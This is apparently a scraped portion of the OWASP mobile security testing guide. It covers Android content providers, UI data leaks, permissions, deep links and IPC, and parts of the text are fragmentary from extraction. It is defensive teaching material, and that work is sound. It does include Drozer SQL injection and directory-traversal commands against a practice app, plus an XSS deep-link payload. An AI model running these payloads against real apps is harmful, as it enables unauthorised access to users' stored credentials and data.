Evaluate Expression
.Security.getProviders()
and press enter.GmsCore_OpenSSL
, which should be the new top-listed provider.When you do not have the source code:
java.security
package, then hook into java.security.Security
with the method getProviders
(with no arguments). The return value will be an array of Provider
.GmsCore_OpenSSL
.The first step is to look at AndroidManifest.xml
to detect content providers exposed by the app. You can identify content providers by the <provider>
element. Complete the following steps:
android:exported
) is \"true\"
. Even if it is not, the tag will be set to \"true\"
automatically if an <intent-filter>
has been defined for the tag. If the content is meant to be accessed only by the app itself, set android:exported
to \"false\"
. If not, set the flag to \"true\"
and define proper read/write permissions.android:permission
). Permission tags limit exposure to other apps.android:protectionLevel
attribute has the value signature
. This setting indicates that the data is intended to be accessed only by apps from the same enterprise (i.e., signed with the same key). To make the data accessible to other apps, apply a security policy with the <permission>
element and set a proper android:protectionLevel
. If you use android:permission
, other applications must declare corresponding <uses-permission>
elements in their manifests to interact with your content provider. You can use the android:grantUriPermissions
attribute to grant more specific access to other apps; you can limit access with the <grant-uri-permission>
element.Inspect the source code to understand how the content provider is meant to be used. Search for the following keywords:
android.content.ContentProvider
android.database.Cursor
android.database.sqlite
.query
.update
.delete
To avoid SQL injection attacks within the app, use parameterized query methods, such as query
, update
, and delete
. Be sure to properly sanitize all method arguments; for example, the selection
argument could lead to SQL injection if it is made up of concatenated user input.
If you expose a content provider, determine whether parameterized query methods (query
, update
, and delete
) are being used to prevent SQL injection. If so, make sure all their arguments are properly sanitized.
We will use the vulnerable password manager app Sieve as an example of a vulnerable content provider.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#inspect-the-android-manifest","title":"Inspect the Android Manifest","text":"Identify all defined <provider>
elements:
<provider\n android:authorities=\"com.mwr.example.sieve.DBContentProvider\"\n android:exported=\"true\"\n android:multiprocess=\"true\"\n android:name=\".DBContentProvider\">\n <path-permission\n android:path=\"/Keys\"\n android:readPermission=\"com.mwr.example.sieve.READ_KEYS\"\n android:writePermission=\"com.mwr.example.sieve.WRITE_KEYS\"\n />\n</provider>\n<provider\n android:authorities=\"com.mwr.example.sieve.FileBackupProvider\"\n android:exported=\"true\"\n android:multiprocess=\"true\"\n android:name=\".FileBackupProvider\"\n/>\n
As shown in the AndroidManifest.xml
above, the application exports two content providers. Note that one path (\"/Keys\") is protected by read and write permissions.
Inspect the query
function in the DBContentProvider.java
file to determine whether any sensitive information is being leaked:
Example in Java:
public Cursor query(final Uri uri, final String[] array, final String s, final String[] array2, final String s2) {\n final int match = this.sUriMatcher.match(uri);\n final SQLiteQueryBuilder sqLiteQueryBuilder = new SQLiteQueryBuilder();\n if (match >= 100 && match < 200) {\n sqLiteQueryBuilder.setTables(\"Passwords\");\n }\n else if (match >= 200) {\n sqLiteQueryBuilder.setTables(\"Key\");\n }\n return sqLiteQueryBuilder.query(this.pwdb.getReadableDatabase(), array, s, array2, (String)null, (String)null, s2);\n}\n
Example in Kotlin:
fun query(uri: Uri?, array: Array<String?>?, s: String?, array2: Array<String?>?, s2: String?): Cursor {\n val match: Int = this.sUriMatcher.match(uri)\n val sqLiteQueryBuilder = SQLiteQueryBuilder()\n if (match >= 100 && match < 200) {\n sqLiteQueryBuilder.tables = \"Passwords\"\n } else if (match >= 200) {\n sqLiteQueryBuilder.tables = \"Key\"\n }\n return sqLiteQueryBuilder.query(this.pwdb.getReadableDatabase(), array, s, array2, null as String?, null as String?, s2)\n }\n
Here we see that there are actually two paths, \"/Keys\" and \"/Passwords\", and the latter is not being protected in the manifest and is therefore vulnerable.
When accessing a URI, the query statement returns all passwords and the path Passwords/
. We will address this in the \"Dynamic Analysis\" section and show the exact URI that is required.
To dynamically analyze an application's content providers, first enumerate the attack surface: pass the app's package name to the Drozer module app.provider.info
:
dz> run app.provider.info -a com.mwr.example.sieve\n Package: com.mwr.example.sieve\n Authority: com.mwr.example.sieve.DBContentProvider\n Read Permission: null\n Write Permission: null\n Content Provider: com.mwr.example.sieve.DBContentProvider\n Multiprocess Allowed: True\n Grant Uri Permissions: False\n Path Permissions:\n Path: /Keys\n Type: PATTERN_LITERAL\n Read Permission: com.mwr.example.sieve.READ_KEYS\n Write Permission: com.mwr.example.sieve.WRITE_KEYS\n Authority: com.mwr.example.sieve.FileBackupProvider\n Read Permission: null\n Write Permission: null\n Content Provider: com.mwr.example.sieve.FileBackupProvider\n Multiprocess Allowed: True\n Grant Uri Permissions: False\n
In this example, two content providers are exported. Both can be accessed without permission, except for the /Keys
path in the DBContentProvider
. With this information, you can reconstruct part of the content URIs to access the DBContentProvider
(the URIs begin with content://
).
To identify content provider URIs within the application, use Drozer's scanner.provider.finduris
module. This module guesses paths and determines accessible content URIs in several ways:
dz> run scanner.provider.finduris -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nUnable to Query content://com.mwr.example.sieve.DBContentProvider/\n...\nUnable to Query content://com.mwr.example.sieve.DBContentProvider/Keys\nAccessible content URIs:\ncontent://com.mwr.example.sieve.DBContentProvider/Keys/\ncontent://com.mwr.example.sieve.DBContentProvider/Passwords\ncontent://com.mwr.example.sieve.DBContentProvider/Passwords/\n
Once you have a list of accessible content providers, try to extract data from each provider with the app.provider.query
module:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical\n_id: 1\nservice: Email\nusername: incognitoguy50\npassword: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64 - encoded)\nemail: incognitoguy50@gmail.com\n
You can also use Drozer to insert, update, and delete records from a vulnerable content provider:
dz> run app.provider.insert content://com.vulnerable.im/messages\n --string date 1331763850325\n --string type 0\n --integer _id 7\n
dz> run app.provider.update content://settings/secure\n --selection \"name=?\"\n --selection-args assisted_gps_enabled\n --integer value 0\n
dz> run app.provider.delete content://settings/secure\n --selection \"name=?\"\n --selection-args my_setting\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#sql-injection-in-content-providers","title":"SQL Injection in Content Providers","text":"The Android platform promotes SQLite databases for storing user data. Because these databases are based on SQL, they may be vulnerable to SQL injection. You can use the Drozer module app.provider.query
to test for SQL injection by manipulating the projection and selection fields that are passed to the content provider:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"'\"\nunrecognized token: \"' FROM Passwords\" (code 1): , while compiling: SELECT ' FROM Passwords\n\ndz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection \"'\"\nunrecognized token: \"')\" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')\n
If an application is vulnerable to SQL Injection, it will return a verbose error message. SQL Injection on Android may be used to modify or query data from the vulnerable content provider. In the following example, the Drozer module app.provider.query
is used to list all the database tables:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"*\nFROM SQLITE_MASTER WHERE type='table';--\"\n| type | name | tbl_name | rootpage | sql |\n| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |\n| table | Passwords | Passwords | 4 | CREATE TABLE ... |\n| table | Key | Key | 5 | CREATE TABLE ... |\n
SQL Injection may also be used to retrieve data from otherwise protected tables:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection \"* FROM Key;--\"\n| Password | pin |\n| thisismypassword | 9876 |\n
You can automate these steps with the scanner.provider.injection
module, which automatically finds vulnerable content providers within an app:
dz> run scanner.provider.injection -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nInjection in Projection:\n content://com.mwr.example.sieve.DBContentProvider/Keys/\n content://com.mwr.example.sieve.DBContentProvider/Passwords\n content://com.mwr.example.sieve.DBContentProvider/Passwords/\nInjection in Selection:\n content://com.mwr.example.sieve.DBContentProvider/Keys/\n content://com.mwr.example.sieve.DBContentProvider/Passwords\n content://com.mwr.example.sieve.DBContentProvider/Passwords/\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0007/#file-system-based-content-providers","title":"File System Based Content Providers","text":"Content providers can provide access to the underlying filesystem. This allows apps to share files (the Android sandbox normally prevents this). You can use the Drozer modules app.provider.read
and app.provider.download
to read and download files, respectively, from exported file-based content providers. These content providers are susceptible to directory traversal, which allows otherwise protected files in the target application's sandbox to be read.
dz> run app.provider.download content://com.vulnerable.app.FileProvider/../../../../../../../../data/data/com.vulnerable.app/database.db /home/user/database.db\nWritten 24488 bytes\n
Use the scanner.provider.traversal
module to automate the process of finding content providers that are susceptible to directory traversal:
dz> run scanner.provider.traversal -a com.mwr.example.sieve\nScanning com.mwr.example.sieve...\nVulnerable Providers:\n content://com.mwr.example.sieve.FileBackupProvider/\n content://com.mwr.example.sieve.FileBackupProvider\n
Note that adb
can also be used to query content providers:
$ adb shell content query --uri content://com.owaspomtg.vulnapp.provider.CredentialProvider/credentials\nRow: 0 id=1, username=admin, password=StrongPwd\nRow: 1 id=2, username=test, password=test\n...\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/","title":"Checking for Sensitive Data Disclosure Through the User Interface","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#overview","title":"Overview","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#static-analysis","title":"Static Analysis","text":"Carefully review all UI components that either show such information or take it as input. Search for any traces of sensitive information and evaluate if it should be masked or completely removed.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#text-fields","title":"Text Fields","text":"To make sure an application is masking sensitive user input, check for the following attribute in the definition of EditText
:
android:inputType=\"textPassword\"\n
With this setting, dots (instead of the input characters) will be displayed in the text field, preventing the app from leaking passwords or pins to the user interface.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#app-notifications","title":"App Notifications","text":"When statically assessing an application, it is recommended to search for any usage of the NotificationManager
class which might be an indication of some form of notification management. If the class is being used, the next step would be to understand how the application is generating the notifications.
These code locations can be fed into the Dynamic Analysis section below, providing an idea of where in the application notifications may be dynamically generated.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#dynamic-analysis","title":"Dynamic Analysis","text":"To determine whether the application leaks any sensitive information to the user interface, run the application and identify components that could be disclosing information.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#text-fields_1","title":"Text Fields","text":"If the information is masked by, for example, replacing input with asterisks or dots, the app isn't leaking data to the user interface.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0008/#app-notifications_1","title":"App Notifications","text":"To identify the usage of notifications run through the entire application and all its available functions looking for ways to trigger any notifications. Consider that you may need to perform actions outside of the application in order to trigger certain notifications.
While running the application you may want to start tracing all calls to functions related to the notifications creation, e.g. setContentTitle
or setContentText
from NotificationCompat.Builder
. Observe the trace in the end and evaluate if it contains any sensitive information.
A screenshot of the current activity is taken when an Android app goes into background and displayed for aesthetic purposes when the app returns to the foreground. However, this may leak sensitive information.
To determine whether the application may expose sensitive information via the app switcher, find out whether the FLAG_SECURE
option has been set. You should find something similar to the following code snippet:
Example in Java:
getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,\n WindowManager.LayoutParams.FLAG_SECURE);\n\nsetContentView(R.layout.activity_main);\n
Example in Kotlin:
window.setFlags(WindowManager.LayoutParams.FLAG_SECURE,\n WindowManager.LayoutParams.FLAG_SECURE)\n\nsetContentView(R.layout.activity_main)\n
If the option has not been set, the application is vulnerable to screen capturing.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0010/#dynamic-analysis","title":"Dynamic Analysis","text":"While black-box testing the app, navigate to any screen that contains sensitive information and click the home button to send the app to the background, then press the app switcher button to see the snapshot. As shown below, if FLAG_SECURE
is set (left image), the snapshot will be empty; if the flag has not been set (right image), activity information will be shown:
On devices supporting file-based encryption (FBE), snapshots are stored in the /data/system_ce/<USER_ID>/<IMAGE_FOLDER_NAME>
folder. <IMAGE_FOLDER_NAME>
depends on the vendor but most common names are snapshots
and recent_images
. If the device doesn't support FBE, the /data/system/<IMAGE_FOLDER_NAME>
folder is used.
Accessing these folders and the snapshots requires root.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/","title":"Testing for App Permissions","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#overview","title":"Overview","text":"When testing app permissions the goal is to try and reduce the amount of permissions used by your app to the absolute minimum. While going through each permission, remember that it is best practice first to try and evaluate whether your app needs to use this permission because many functionalities such as taking a photo can be done without, limiting the amount of access to sensitive data. If permissions are required you will then make sure that the request/response to access the permission is handled handled correctly.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#android-permissions","title":"Android Permissions","text":"Check permissions to make sure that the app really needs them and remove unnecessary permissions. For example, the INTERNET
permission in the AndroidManifest.xml file is necessary for an Activity to load a web page into a WebView. Because a user can revoke an application's right to use a dangerous permission, the developer should check whether the application has the appropriate permission each time an action is performed that would require that permission.
<uses-permission android:name=\"android.permission.INTERNET\" />\n
Go through the permissions with the developer to identify the purpose of every permission set and remove unnecessary permissions.
Besides going through the AndroidManifest.xml file manually, you can also use the Android Asset Packaging tool (aapt) to examine the permissions of an APK file.
aapt comes with the Android SDK within the build-tools folder. It requires an APK file as input. You may list the APKs in the device by running adb shell pm list packages -f | grep -i <keyword>
as seen in \"Listing Installed Apps\".
$ aapt d permissions app-x86-debug.apk\npackage: sg.vp.owasp_mobile.omtg_android\nuses-permission: name='android.permission.WRITE_EXTERNAL_STORAGE'\nuses-permission: name='android.permission.INTERNET'\n
Alternatively you may obtain a more detailed list of permissions via adb and the dumpsys tool:
$ adb shell dumpsys package sg.vp.owasp_mobile.omtg_android | grep permission\n requested permissions:\n android.permission.WRITE_EXTERNAL_STORAGE\n android.permission.INTERNET\n android.permission.READ_EXTERNAL_STORAGE\n install permissions:\n android.permission.INTERNET: granted=true\n runtime permissions:\n
Please reference this permissions overview for descriptions of the listed permissions that are considered dangerous.
READ_CALENDAR\nWRITE_CALENDAR\nREAD_CALL_LOG\nWRITE_CALL_LOG\nPROCESS_OUTGOING_CALLS\nCAMERA\nREAD_CONTACTS\nWRITE_CONTACTS\nGET_ACCOUNTS\nACCESS_FINE_LOCATION\nACCESS_COARSE_LOCATION\nRECORD_AUDIO\nREAD_PHONE_STATE\nREAD_PHONE_NUMBERS\nCALL_PHONE\nANSWER_PHONE_CALLS\nADD_VOICEMAIL\nUSE_SIP\nBODY_SENSORS\nSEND_SMS\nRECEIVE_SMS\nREAD_SMS\nRECEIVE_WAP_PUSH\nRECEIVE_MMS\nREAD_EXTERNAL_STORAGE\nWRITE_EXTERNAL_STORAGE\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#custom-permissions","title":"Custom Permissions","text":"Apart from enforcing custom permissions via the application manifest file, you can also check permissions programmatically. This is not recommended, however, because it is more error-prone and can be bypassed more easily with, e.g., runtime instrumentation. It is recommended that the ContextCompat.checkSelfPermission
method is called to check if an activity has a specified permission. Whenever you see code like the following snippet, make sure that the same permissions are enforced in the manifest file.
private static final String TAG = \"LOG\";\nint canProcess = checkCallingOrSelfPermission(\"com.example.perm.READ_INCOMING_MSG\");\nif (canProcess != PERMISSION_GRANTED)\nthrow new SecurityException();\n
Or with ContextCompat.checkSelfPermission
which compares it to the manifest file.
if (ContextCompat.checkSelfPermission(secureActivity.this, Manifest.READ_INCOMING_MSG)\n != PackageManager.PERMISSION_GRANTED) {\n //!= stands for not equals PERMISSION_GRANTED\n Log.v(TAG, \"Permission denied\");\n }\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0024/#requesting-permissions","title":"Requesting Permissions","text":"If your application has permissions that need to be requested at runtime, the application must call the requestPermissions
method in order to obtain them. The app passes the permissions needed and an integer request code you have specified to the user asynchronously, returning once the user chooses to accept or deny the request in the same thread. After the response is returned the same request code is passed to the app's callback method.
private static final String TAG = \"LOG\";\n// We start by checking the permission of the current Activity\nif (ContextCompat.checkSelfPermission(secureActivity.this,\n Manifest.permission.WRITE_EXTERNAL_STORAGE)\n != PackageManager.PERMISSION_GRANTED) {\n\n // Permission is not granted\n // Should we show an explanation?\n if (ActivityCompat.shouldShowRequestPermissionRationale(secureActivity.this,\n //Gets whether you should show UI with rationale for requesting permission.\n //You should do this only if you do not have permission and the permission requested rationale is not communicated clearly to the user.\n Manifest.permission.WRITE_EXTERNAL_STORAGE)) {\n // Asynchronous thread waits for the users response.\n // After the user sees the explanation try requesting the permission again.\n } else {\n // Request a permission that doesn't need to be explained.\n ActivityCompat.requestPermissions(secureActivity.this,\n new String[]{Manifest.permission.WRITE_EXTERNAL_STORAGE},\n MY_PERMISSIONS_REQUEST_WRITE_EXTERNAL_STORAGE);\n // MY_PERMISSIONS_REQUEST_WRITE_EXTERNAL_STORAGE will be the app-defined int constant.\n // The callback method gets the result of the request.\n }\n} else {\n // Permission already granted debug message printed in terminal.\n Log.v(TAG, \"Permission already granted.\");\n}\n
Please note that if you need to provide any information or explanation to the user it needs to be done before the call to requestPermissions
, since the system dialog box can not be altered once called.
Now your app has to override the system method onRequestPermissionsResult
to see if the permission was granted. This method receives the requestCode
integer as input parameter (which is the same request code that was created in requestPermissions
).
The following callback method may be used for WRITE_EXTERNAL_STORAGE
.
@Override //Needed to override system method onRequestPermissionsResult()\npublic void onRequestPermissionsResult(int requestCode, //requestCode is what you specified in requestPermissions()\n String permissions[], int[] permissionResults) {\n switch (requestCode) {\n case MY_PERMISSIONS_WRITE_EXTERNAL_STORAGE: {\n if (grantResults.length > 0\n && permissionResults[0] == PackageManager.PERMISSION_GRANTED) {\n // 0 is a canceled request, if int array equals requestCode permission is granted.\n } else {\n // permission denied code goes here.\n Log.v(TAG, \"Permission denied\");\n }\n return;\n }\n // Other switch cases can be added here for multiple permission checks.\n }\n}\n
Permissions should be explicitly requested for every needed permission, even if a similar permission from the same group has already been requested. For applications targeting Android 7.1 (API level 25) and older, Android will automatically give an application all the permissions from a permission group, if the user grants one of the requested permissions of that group. Starting with Android 8.0 (API level 26), permissions will still automatically be granted if a user has already granted a permission from the same permission group, but the application still needs to explicitly request the permission. In this case, the onRequestPermissionsResult
handler will automatically be triggered without any user interaction.
For example if both READ_EXTERNAL_STORAGE
and WRITE_EXTERNAL_STORAGE
are listed in the Android Manifest but only permissions are granted for READ_EXTERNAL_STORAGE
, then requesting WRITE_EXTERNAL_STORAGE
will automatically have permissions without user interaction because they are in the same group and not explicitly requested.
Always check whether the application is requesting permissions it actually requires. Make sure that no permissions are requested which are not related to the goal of the app, especially DANGEROUS
and SIGNATURE
permissions, since they can affect both the user and the application if mishandled. For instance, it should be suspicious if a single-player game app requires access to android.permission.WRITE_SMS
.
When analyzing permissions, you should investigate the concrete use case scenarios of the app and always check if there are replacement APIs for any DANGEROUS
permissions in use. A good example is the SMS Retriever API which streamlines the usage of SMS permissions when performing SMS-based user verification. By using this API an application does not have to declare DANGEROUS
permissions which is a benefit to both the user and developers of the application, who doesn't have to submit the Permissions Declaration Form.
Permissions for installed applications can be retrieved with adb
. The following extract demonstrates how to examine the permissions used by an application.
$ adb shell dumpsys package com.google.android.youtube\n...\ndeclared permissions:\n com.google.android.youtube.permission.C2D_MESSAGE: prot=signature, INSTALLED\nrequested permissions:\n android.permission.INTERNET\n android.permission.ACCESS_NETWORK_STATE\ninstall permissions:\n com.google.android.c2dm.permission.RECEIVE: granted=true\n android.permission.USE_CREDENTIALS: granted=true\n com.google.android.providers.gsf.permission.READ_GSERVICES: granted=true\n...\n
The output shows all permissions using the following categories:
When doing the dynamic analysis:
android.permission.WRITE_SMS
, might not be a good idea.ACCESS_COARSE_LOCATION
permission instead of ACCESS_FINE_LOCATION
. Or even better not requesting the permission at all, and instead ask the user to enter a postal code.ACTION_IMAGE_CAPTURE
or ACTION_VIDEO_CAPTURE
intent action instead of requesting the CAMERA
permission.ACCESS_FINE_LOCATION
, ACCESS_COARSE_LOCATIION
, or BLUETOOTH_ADMIN
permissions.To obtain detail about a specific permission you can refer to the Android Documentation.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/","title":"Testing Deep Links","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#overview","title":"Overview","text":"Any existing deep links (including App Links) can potentially increase the app attack surface. This includes many risks such as link hijacking, sensitive functionality exposure, etc.
All deep links must be enumerated and verified for correct website association. The actions they perform must be well tested, especially all input data, which should be deemed untrustworthy and thus should always be validated.
None of the input from these sources can be trusted; it must be validated and/or sanitized. Validation ensures processing of data that the app is expecting only. If validation is not enforced, any input can be sent to the app, which may allow an attacker or malicious app to exploit app functionality.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#check-for-android-os-version","title":"Check for Android OS Version","text":"The Android version in which the app runs also influences the risk of using deep links. Inspect the Android Manifest to check if minSdkVersion
is 31 or higher.
Inspecting the Android Manifest:
You can easily determine whether deep links (with or without custom URL schemes) are defined by decoding the app using apktool and inspecting the Android Manifest file looking for <intent-filter>
elements.
myapp://
.<activity android:name=\".MyUriActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.VIEW\" />\n <category android:name=\"android.intent.category.DEFAULT\" />\n <category android:name=\"android.intent.category.BROWSABLE\" />\n <data android:scheme=\"myapp\" android:host=\"path\" />\n </intent-filter>\n</activity>\n
http://
and https://
schemes, along with the host and path that will activate it (in this case, the full URL would be https://www.myapp.com/my/app/path
):<intent-filter>\n ...\n <data android:scheme=\"http\" android:host=\"www.myapp.com\" android:path=\"/my/app/path\" />\n <data android:scheme=\"https\" android:host=\"www.myapp.com\" android:path=\"/my/app/path\" />\n</intent-filter>\n
<intent-filter>
includes the flag android:autoVerify=\"true\"
, this causes the Android system to reach out to the declared android:host
in an attempt to access the Digital Asset Links file in order to verify the App Links. A deep link can be considered an App Link only if the verification is successful.<intent-filter android:autoVerify=\"true\">\n
When listing deep links remember that <data>
elements within the same <intent-filter>
are actually merged together to account for all variations of their combined attributes.
<intent-filter>\n ...\n <data android:scheme=\"https\" android:host=\"www.example.com\" />\n <data android:scheme=\"app\" android:host=\"open.my.app\" />\n</intent-filter>\n
It might seem as though this supports only https://www.example.com
and app://open.my.app
. However, it actually supports:
https://www.example.com
app://open.my.app
app://www.example.com
https://open.my.app
Using Dumpsys:
Use adb to run the following command that will show all schemes:
adb shell dumpsys package com.example.package\n
Using Android \"App Link Verification\" Tester:
Use the Android \"App Link Verification\" Tester script to list all deep links (list-all
) or only app links (list-applinks
):
python3 deeplink_analyser.py -op list-all -apk ~/Downloads/example.apk\n\n.MainActivity\n\napp://open.my.app\napp://www.example.com\nhttps://open.my.app\nhttps://www.example.com\n
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/#check-for-correct-website-association","title":"Check for Correct Website Association","text":"Even if deep links contain the android:autoVerify=\"true\"
attribute, they must be actually verified in order to be considered App Links. You should test for any possible misconfigurations that might prevent full verification.
Use the Android \"App Link Verification\" Tester script to get the verification status for all app links (verify-applinks
). See an example here.
Only on Android 12 (API level 31) or higher:
You can use adb to test the verification logic regardless of whether the app targets Android 12 (API level 31) or not. This feature allows you to:
You can also review the verification results. For example:
adb shell pm get-app-links com.example.package\n\ncom.example.package:\n ID: 01234567-89ab-cdef-0123-456789abcdef\n Signatures: [***]\n Domain verification state:\n example.com: verified\n sub.example.com: legacy_failure\n example.net: verified\n example.org: 1026\n
The same information can be found by running adb shell dumpsys package com.example.package
(only on Android 12 (API level 31) or higher).
This section details a few, of potentially many, reasons why the verification process failed or was not actually triggered. See more information in the Android Developers Documentation and in the white paper \"Measuring the Insecurity of Mobile Deep Links of Android\".
Check the Digital Asset Links file:
/.well-known/
path. Example: https://www.example.com/.well-known/assetlinks.json
https://digitalassetlinks.googleapis.com/v1/statements:list?source.web.site=www.example.com
Check for Redirects:
To enhance the app security, the system doesn't verify any Android App Links for an app if the server sets a redirect such as http://example.com
to https://example.com
or example.com
to www.example.com
.
Check for Subdomains:
If an intent filter lists multiple hosts with different subdomains, there must be a valid Digital Asset Links file on each domain. For example, the following intent filter includes www.example.com
and mobile.example.com
as accepted intent URL hosts.
<application>\n <activity android:name=\u201dMainActivity\u201d>\n <intent-filter android:autoVerify=\"true\">\n <action android:name=\"android.intent.action.VIEW\" />\n <category android:name=\"android.intent.category.DEFAULT\" />\n <category android:name=\"android.intent.category.BROWSABLE\" />\n <data android:scheme=\"https\" />\n <data android:scheme=\"https\" />\n <data android:host=\"www.example.com\" />\n <data android:host=\"mobile.example.com\" />\n </intent-filter>\n </activity>\n</application>\n
In order for the deep links to correctly register, a valid Digital Asset Links file must be published at both https://www.example.com/.well-known/assetlinks.json
and https://mobile.example.com/.well-known/assetlinks.json
.
Check for Wildcards:
If the hostname includes a wildcard (such as *.example.com
), you should be able to find a valid Digital Asset Links file at the root hostname: https://example.com/.well-known/assetlinks.json
.
Even if the deep link is correctly verified, the logic of the handler method should be carefully analyzed. Pay special attention to deep links being used to transmit data (which is controlled externally by the user or any other app).
First, obtain the name of the Activity from the Android Manifest <activity>
element which defines the target <intent-filter>
and search for usage of getIntent
and getData
. This general approach of locating these methods can be used across most applications when performing reverse engineering and is key when trying to understand how the application uses deep links and handles any externally provided input data and if it could be subject to any kind of abuse.
The following example is a snippet from an exemplary Kotlin app decompiled with jadx. From the static analysis we know that it supports the deep link deeplinkdemo://load.html/
as part of com.mstg.deeplinkdemo.WebViewActivity
.
// snippet edited for simplicity\npublic final class WebViewActivity extends AppCompatActivity {\n private ActivityWebViewBinding binding;\n\n public void onCreate(Bundle savedInstanceState) {\n Uri data = getIntent().getData();\n String html = data == null ? null : data.getQueryParameter(\"html\");\n Uri data2 = getIntent().getData();\n String deeplink_url = data2 == null ? null : data2.getQueryParameter(\"url\");\n View findViewById = findViewById(R.id.webView);\n if (findViewById != null) {\n WebView wv = (WebView) findViewById;\n wv.getSettings().setJavaScriptEnabled(true);\n if (deeplink_url != null) {\n wv.loadUrl(deeplink_url);\n ...\n
You can simply follow the deeplink_url
String variable and see the result from the wv.loadUrl
call. This means the attacker has full control of the URL being loaded into the WebView (which, as shown above, has JavaScript enabled).
The same WebView might be also rendering an attacker controlled parameter. In that case, the following deep link payload would trigger Reflected Cross-Site Scripting (XSS) within the context of the WebView:
deeplinkdemo://load.html?attacker_controlled=<svg onload=alert(1)>\n
But there are many other possibilities. Be sure to check the following sections to learn more about what to expect and how to test different scenarios:
In addition, we recommend searching for and reading public reports (search term: \"deep link*\"|\"deeplink*\" site:https://hackerone.com/reports/
). For example:
Here you will use the list of deep links from the static analysis to iterate and determine each handler method and the processed data, if any. You will first start a Frida hook and then begin invoking the deep links.
The following example assumes a target app that accepts this deep link: deeplinkdemo://load.html
. However, we don't know the corresponding handler method yet, nor the parameters it potentially accepts.
[Step 1] Frida Hooking:
You can use the script \"Android Deep Link Observer\" from Frida CodeShare to monitor all invoked deep links triggering a call to Intent.getData
. You can also use the script as a base to include your own modifications depending on the use case at hand. In this case we included the stack trace in the script since we are interested in the method which calls Intent.getData
.
[Step 2] Invoking Deep Links:
Now you can invoke any of the deep links using adb and the Activity Manager (am) which will send intents within the Android device. For example:
adb shell am start -W -a android.intent.action.VIEW -d \"deeplinkdemo://load.html/?message=ok#part1\"\n\nStarting: Intent { act=android.intent.action.VIEW dat=deeplinkdemo://load.html/?message=ok }\nStatus: ok\nLaunchState: WARM\nActivity: com.mstg.deeplinkdemo/.WebViewActivity\nTotalTime: 210\nWaitTime: 217\nComplete\n
This might trigger the disambiguation dialog when using the \"http/https\" scheme or if other installed apps support the same custom URL scheme. You can include the package name to make it an explicit intent.
This invocation will log the following:
[*] Intent.getData() was called\n[*] Activity: com.mstg.deeplinkdemo.WebViewActivity\n[*] Action: android.intent.action.VIEW\n\n[*] Data\n- Scheme: deeplinkdemo://\n- Host: /load.html\n- Params: message=ok\n- Fragment: part1\n\n[*] Stacktrace:\n\nandroid.content.Intent.getData(Intent.java)\ncom.mstg.deeplinkdemo.WebViewActivity.onCreate(WebViewActivity.kt)\nandroid.app.Activity.performCreate(Activity.java)\n...\ncom.android.internal.os.ZygoteInit.main(ZygoteInit.java)\n
In this case we've crafted the deep link including arbitrary parameters (?message=ok
) and fragment (#part1
). We still don't know if they are being used. The information above reveals useful information that you can use now to reverse engineer the app. See the section \"Check the Handler Method\" to learn about things you should consider.
WebViewActivity.kt
com.mstg.deeplinkdemo.WebViewActivity
onCreate
Sometimes you can even take advantage of other applications that you know interact with your target app. You can reverse engineer the app, (e.g. to extract all strings and filter those which include the target deep links, deeplinkdemo:///load.html
in the previous case), or use them as triggers, while hooking the app as previously discussed.
To test for sensitive functionality exposure through IPC mechanisms you should first enumerate all the IPC mechanisms the app uses and then try to identify whether sensitive data is leaked when the mechanisms are used.
"},{"location":"MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0029/#static-analysis","title":"Static Analysis","text":"We start by looking at the AndroidManifest.xml, where all activities, services, and content providers included in the app must be declared (otherwise the system won't recognize them and they won't run).
<intent-filter>
<service>
<provider>
<receiver>
An \"exported\" activity, service, or content provider can be accessed by other apps. There are two common ways to designate a component as exported. The obvious one is setting the export tag to true android:exported=\"true\"
. The second way involves defining an <intent-filter>
within the component element (<activity>
, <service>
, <receiver>
). When this is done, the export tag is automatically set to \"true\". To prevent all other Android apps from interacting with the IPC component element, be sure that the android:exported=\"true\"
value and an <intent-filter>
aren't in their AndroidManifest.xml
files unless this is necessary.
